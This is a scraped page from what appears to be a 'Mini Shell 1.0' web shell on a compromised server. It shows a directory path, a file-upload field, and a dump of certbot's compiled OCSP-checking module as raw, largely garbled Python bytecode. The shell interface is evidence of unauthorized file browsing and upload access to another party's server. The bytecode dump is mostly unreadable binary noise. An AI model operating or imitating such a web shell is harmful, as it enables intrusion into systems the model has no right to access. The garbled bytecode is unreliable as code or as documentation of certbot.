HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /lib/python3/dist-packages/certbot/__pycache__/
Upload File :
Current File : //lib/python3/dist-packages/certbot/__pycache__/ocsp.cpython-311.pyc
�

E��cl:�
���dZddlmZddlmZddlZddlZddlZddlmZddlmZddlm	Z	ddl
mZdd	lm
Z
dd
lmZddlmZddlmZdd
lmZddlmZddlZddlZddlmZddlmZddlmZddlmZddlmZej e!��Z"Gd�d��Z#de$de	ee$ee$ffd�Z%de$de$de$de&de'f
d�Z(dddd d!ej)de$ddf
d"�Z*ddd!ej)de$ddfd#�Z+de$d$e$d%e$de'fd&�Z,dS)'z*Tools for checking certificate revocation.�)�datetime)�	timedeltaN)�PIPE)�Optional)�Tuple)�x509)�InvalidSignature)�UnsupportedAlgorithm)�default_backend)�hashes)�
serialization)�ocsp)�crypto_util)�errors)�util)�getenv)�
RenewableCertc�n�eZdZdZddeddfd�Zdedefd�Zdd
edede	defd
�Z
d
edededede	defd�ZdS)�RevocationCheckerzEThis class figures out OCSP checking on this system, and performs it.F�enforce_openssl_binary_usage�returnNc	�F�d|_||_|jr�tjd��s#t�d��d|_dSt
jgd�ttddtj	�����}d|j
vr
d�|_dSd	�|_dSdS)
NF�opensslz-openssl not installed, can't check revocationT)rr�-header�var�val)�stdout�stderr�universal_newlines�check�envz	Missing =c��d|zgS)NzHost=���hosts �./usr/lib/python3/dist-packages/certbot/ocsp.py�<lambda>z,RevocationChecker.__init__.<locals>.<lambda>1s
��w��~�.>��c�
�d|gS)N�Hostr#r$s r&r'z,RevocationChecker.__init__.<locals>.<lambda>3s
��v�t�n�r()�broken�use_openssl_binaryr�
exe_exists�logger�info�
subprocess�runr�env_no_snap_for_external_callsr�	host_args)�selfr�test_host_formats   r&�__init__zRevocationChecker.__init__"s������">����"�
	=��?�9�-�-�
����K�L�L�L�"����� *�~�.Z�.Z�.Z�,0��RV�+0�d�6Y�6[�6[� ]� ]� ]���.�5�5�5�!>�!>�����!<�!<�����
	=�
	=r(�certc�B�|�|j|j��S)a Get revoked status for a particular cert version.

        .. todo:: Make this a non-blocking call

        :param `.interfaces.RenewableCert` cert: Certificate object
        :returns: True if revoked; False if valid or the check failed or cert is expired.
        :rtype: bool

        )�ocsp_revoked_by_paths�	cert_path�
chain_path)r4r7s  r&�ocsp_revokedzRevocationChecker.ocsp_revoked5s���)�)�$�.�$�/�J�J�Jr(�
r:r;�timeoutc�<�|jrdStj�t	j����}t
j|��|krdSt|��\}}|r|sdS|j	r|�
|||||��St||||��S)aEPerforms the OCSP revocation check

        :param str cert_path: Certificate filepath
        :param str chain_path: Certificate chain
        :param int timeout: Timeout (in seconds) for the OCSP query

        :returns: True if revoked; False if valid or the check failed or cert is expired.
        :rtype: bool

        F)r+�pytz�UTC�fromutcr�utcnowr�notAfter�_determine_ocsp_serverr,�_check_ocsp_openssl_bin�_check_ocsp_cryptography)r4r:r;r>�now�urlr%s       r&r9z'RevocationChecker.ocsp_revoked_by_pathsAs����;�	��5�
�h���x��0�0�1�1����	�*�*�c�1�1��5�*�9�5�5�	��T��	�3�	��5��"�	[��/�/�	�:�t�S�RY�Z�Z�Z�'�	�:�s�G�L�L�Lr(r%rIc��td��}td��}d}|�|�|�|n|}|�d|g}	n2|�d��r|td��d�}d|d|g}	ddd	d
|d|d|d
|ddt|��dg|�|��z|	z}
t
�d|��t
�d�|
����	tj	|
t
j���\}}n1#tj$rt
�d|��YdSwxYwt|||��S)N�
http_proxy�
HTTP_PROXYz-urlzhttp://z-hostz-pathrrz	-no_noncez-issuerz-certz-CAfilez
-verify_otherz-trust_otherz-timeoutrzQuerying OCSP for %s� )�log�*OCSP check failed for %s (are we offline?)F)r�
startswith�len�strr3r.�debug�joinr�
run_scriptr�SubprocessErrorr/�_translate_ocsp_query)
r4r:r;r%rIr>�env_http_proxy�env_HTTP_PROXY�
proxy_host�url_opts�cmd�output�errs
             r&rFz)RevocationChecker._check_ocsp_openssl_bin^s{�� ��-�-����-�-���
��%��)C�+9�+E���>�J�����}�H�H��$�$�Y�/�/�
9�'��I�����8�
���W�c�:�H��&���*��	��*��
���3�w�<�<���!�N�N�4�0�0�1�4<�<��	���+�Y�7�7�7����S�X�X�c�]�]�#�#�#�	��/�#�6�<�@�@�@�K�F�C�C���%�	�	�	��K�K�D�i�P�P�P��5�5�	����%�Y���<�<�<s�$#D�*D6�5D6)F)r=)�__name__�
__module__�__qualname__�__doc__�boolr6rr<rR�intr9rFr#r(r&rrs�������O�O�=�=�T�=�d�=�=�=�=�&
K��
K�4�
K�
K�
K�
K�M�M�s�M��M�c�M�[_�M�M�M�M�:#=��#=�#�#=�&)�#=�03�#=�>A�#=�FJ�#=�#=�#=�#=�#=�#=r(rr:rc���t|d��5}tj|���t	����}ddd��n#1swxYwY	|j�tj��}tjj	��fd�|j
D��}|djj
}n8#tjtf$rt�d|��YdSwxYw|���}|�d��d�d	��}|r||fSt�d
||��dS)z�Extract the OCSP server host from a certificate.

    :param str cert_path: Path to the cert we're checking OCSP for
    :rtype tuple:
    :returns: (OCSP server URL or None, OCSP server host or None)

    �rbNc�*��g|]}|j�k�
|��Sr#)�
access_method)�.0�description�ocsp_oids  �r&�
<listcomp>z*_determine_ocsp_server.<locals>.<listcomp>�s3���B�B�B��&�4��@�@�$�@�@�@r(rzCannot extract OCSP URI from %s)NNz://��/z;Cannot process OCSP host from URL (%s) in certificate at %s)�openr�load_pem_x509_certificate�readr�
extensions�get_extension_for_class�AuthorityInformationAccess�AuthorityInformationAccessOID�OCSP�value�access_location�ExtensionNotFound�
IndexErrorr.r/�rstrip�	partition)r:�file_handlerr7�	extension�descriptionsrIr%rks       @r&rErE�s����
�i��	�	�V�,��-�l�.?�.?�.A�.A�?�CT�CT�U�U��V�V�V�V�V�V�V�V�V�V�V����V�V�V�V�	��O�;�;�D�<[�\�\�	��5�:��B�B�B�B�y��B�B�B���1�o�-�3�����"�J�/�������5�y�A�A�A��z�z������*�*�,�,�C��=�=�����"�)�)�#�.�.�D����D�y��
�K�K�M�s�T]�^�^�^��:s$�4A�A�A�AB9�91C.�-C.r;rIr>c�^�t|d��5}tj|���t	����}ddd��n#1swxYwYt|d��5}tj|���t	����}ddd��n#1swxYwYtj��}|�||tj	����}|�
��}|�tj
j��}		tj||	ddi|���}
n8#tjj$r!t&�d|d���YdSwxYw|
jd	kr#t&�d
||
j��dStj|
j��}|jt
jjkr#t&�d||j��dS	t9||||��t&�d||j��|jt
jj kS#tB$r1}t&�tE|����Yd}~n�d}~wtFj$$r1}t&�tE|����Yd}~nid}~wtJ$rt&�d
|��Yn?tL$r3}
t&�d|tE|
����Yd}
~
nd}
~
wwxYwdS)NrfzContent-Typezapplication/ocsp-request)�data�headersr>rOT)�exc_infoF��z*OCSP check failed for %s (HTTP status: %d)z'Invalid OCSP response status for %s: %sz%OCSP certificate status for %s is: %sz)Invalid signature on OCSP response for %sz!Invalid OCSP response for %s: %s.)'rorrprqrr�OCSPRequestBuilder�add_certificater�SHA1�build�public_bytesr
�Encoding�DER�requests�post�
exceptions�RequestExceptionr.r/�status_code�load_der_ocsp_response�content�response_status�OCSPResponseStatus�
SUCCESSFUL�warning�_check_ocsp_responserS�certificate_status�OCSPCertStatus�REVOKEDr
rRr�Errorr	�AssertionError)r:r;rIr>r}�issuerr7�builder�request�request_binary�response�
response_ocsp�e�errors              r&rGrG�s���	
�j�$�	�	�X�<��/��0A�0A�0C�0C�_�EV�EV�W�W��X�X�X�X�X�X�X�X�X�X�X����X�X�X�X�	
�i��	�	�V�,��-�l�.?�.?�.A�.A�?�CT�CT�U�U��V�V�V�V�V�V�V�V�V�V�V����V�V�V�V��%�'�'�G��%�%�d�F�F�K�M�M�B�B�G��m�m�o�o�G��)�)�-�*@�*D�E�E�N���=��>�*8�:T�)U�)0�2�2�2������/�������@�)�VZ��[�[�[��u�u�������s�"�"����@�)�X�Ma�b�b�b��u��/��0@�A�A�M��$��(?�(J�J�J����@��
� =�	?�	?�	?��u�O��]�G�V�Y�G�G�G�	���<��
� @�	B�	B�	B��/�4�3F�3N�N�N�� �������s�1�v�v��������������<�������s�1�v�v��������������O�O�O����B�I�N�N�N�N�N��S�S�S����:�I�s�5�z�z�R�R�R�R�R�R�R�R�����S�����5sk�4A�A�A�,4B,�,B0�3B0�+E�1E;�:E;�I�
L*�'J�L*�'K�(L*�.	L*�7)L%�%L*r�zocsp.OCSPResponse�request_ocspzocsp.OCSPRequest�issuer_certc�"�|j|jkrtd���t|||��t|jt|j����r |j|jks|j|jkrtd���tj	��}|j
std���|j
|td���zkrtd���|jr+|j|td���z
krtd���dSdS)	z2Verify that the OCSP is valid for several criteriazMthe certificate in response does not correspond to the certificate in requestz<the issuer does not correspond to issuer of the certificate.zparam thisUpdate is not set.�)�minutesz"param thisUpdate is in the future.z param nextUpdate is in the past.N)
�
serial_numberr��_check_ocsp_response_signature�
isinstance�hash_algorithm�type�issuer_key_hash�issuer_name_hashrrC�this_updater�next_update)r�r�r�r:rHs     r&r�r��s5���"�l�&@�@�@��=�>�>�	>�#�=�+�y�I�I�I�
�}�3�T�,�:U�5V�5V�W�W�]��,��0L�L�L��-��1N�N�N��[�\�\�\��/�
�
�C��$�=��;�<�<�<�� �3��1�)=�)=�)=�#=�=�=��A�B�B�B�� �A�]�%>��y�YZ�G[�G[�G[�A[�%[�%[��?�@�@�@�A�A�%[�%[r(c�z��	�dtjdtfd��	�j|jks�j�	|��krt�d|��|}�nt�d|���	�fd��jD��}|std���|d}|j
|jkrtd	���	|j�tj
��}tjjj|jv}n#tjt&f$rd
}YnwxYw|std���|j}t+j|���|j|j|���j}|std���t+j|����j�j|��d
S)zIVerify an OCSP response signature against certificate issuer or responderr7rc�n�tj�|�����jS)N)r�SubjectKeyIdentifier�from_public_key�
public_key�digest)r7s r&�	_key_hashz1_check_ocsp_response_signature.<locals>._key_hash�s&���(�8�8����9J�9J�K�K�R�Rr(zGOCSP response for certificate %s is signed by the certificate's issuer.zGOCSP response for certificate %s is delegated to an external responder.c�\��g|](}�j|jks�j�|��k�&|��)Sr#)�responder_name�subject�responder_key_hash)rir7r�r�s  ��r&rlz2_check_ocsp_response_signature.<locals>.<listcomp>sK���S�S�S�D�+�:�d�l�J�J�+�>�)�)�D�/�/�Q�Q� �Q�Q�Qr(z0no matching responder certificate could be foundrz?responder certificate is not signed by the certificate's issuerFz<responder is not authorized by issuer to sign OCSP responsesz#no signature hash algorithm definedN)r�Certificate�bytesr�r�r�r.rS�certificatesr�r�rrrs�ExtendedKeyUsage�oid�ExtendedKeyUsageOID�OCSP_SIGNINGrwryrz�signature_hash_algorithmr�verify_signed_payloadr��	signature�tbs_certificate_bytes�tbs_response_bytes)
r�r�r:�responder_cert�responder_certsr~�delegate_authorized�chosen_cert_hash�chosen_response_hashr�s
`        @r&r�r��sG����S��(�S�U�S�S�S�S�	�$��(;�;�;��/�9�9�[�3I�3I�I�I����_��	 �	 �	 �$���	���^��	 �	 �	 �S�S�S�S�S�M�,F�S�S�S���	U� �!S�T�T�T�
)��+��� �K�$7�7�7� �"@�A�A�
A�	(�&�1�I�I�$�J_�`�`�I�"&�(�">�"K�y��"^�����&�
�3�	(�	(�	(�"'����	(����"�	a� �!_�`�`�`�*�B��	�)�+�*@�*@�*B�*B�N�D\�*8�*N�P`�	b�	b�	b�)�A�� �D��B�C�C�C��%�n�&?�&?�&A�&A�=�CZ�&3�&F�H\�^�^�^�^�^s�AD�D"�!D"�ocsp_output�ocsp_errorsc����d}�fd�|D��}�fd�|D��\}}}|r|�d��nd}d|vs|r|s|r9t�d���t�d�|��d	S|r|sd	S|r4|�d��}|rt�d
|��dSt�d�|��d	S)
z7Parse openssl's weird output to work out what it means.)�good�revoked�unknownc�<��g|]}d��|����S)z{0}: (WARNING.*)?{1})�format)ri�sr:s  �r&rlz)_translate_ocsp_query.<locals>.<listcomp>3s*���M�M�M��'�.�.�y�!�<�<�M�M�Mr(c3�Z�K�|]%}tj|�tj���V��&dS))�flagsN)�re�search�DOTALL)ri�pr�s  �r&�	<genexpr>z(_translate_ocsp_query.<locals>.<genexpr>4s6�����[�[�Q�b�i��;�b�i�H�H�H�[�[�[�[�[�[r(�NzResponse verify OKz#Revocation status for %s is unknownzUncertain output:
%s
stderr:
%sFzOCSP revocation warning: %sTz2Unable to properly parse OCSP output: %s
stderr:%s)�groupr.r/rSr�)	r:r�r��states�patternsr�r�r�r�s	``       r&rWrW/s����,�F�M�M�M�M�f�M�M�M�H�[�[�[�[�RZ�[�[�[��D�'�7�#�-�d�j�j��m�m�m��G��K�/�/�T�/�g�/�'�/����9�9�E�E�E����9�;��T�T�T��u�	
�
�g�
��u�	���-�-��"�"���	@��K�K�5�w�?�?�?��t����L�"�K�	1�	1�	1��ur()-rbrr�loggingr�r0r�typingrr�cryptographyr�cryptography.exceptionsr	r
�cryptography.hazmat.backendsr�cryptography.hazmat.primitivesrr
�cryptography.x509rr@r��certbotrrr�certbot.compat.osr�certbot.interfacesr�	getLoggerr_r.rrRrErdrcrGr�r�r�rWr#r(r&�<module>r�s���0�0�����������������	�	�	�	�����������������������������4�4�4�4�4�4�8�8�8�8�8�8�8�8�8�8�8�8�1�1�1�1�1�1�8�8�8�8�8�8�"�"�"�"�"�"���������������������������$�$�$�$�$�$�,�,�,�,�,�,�
��	�8�	$�	$��b=�b=�b=�b=�b=�b=�b=�b=�J�c��e�H�S�M�8�C�=�4P�.Q�����<.��.��.�3�.�QT�.�Y]�.�.�.�.�b A�(;� A�K]� A�&*�&6� A�CF� A�KO� A� A� A� A�F6^�2E�6^�04�0@�6^�MP�6^�UY�6^�6^�6^�6^�r�S��s����QU������r(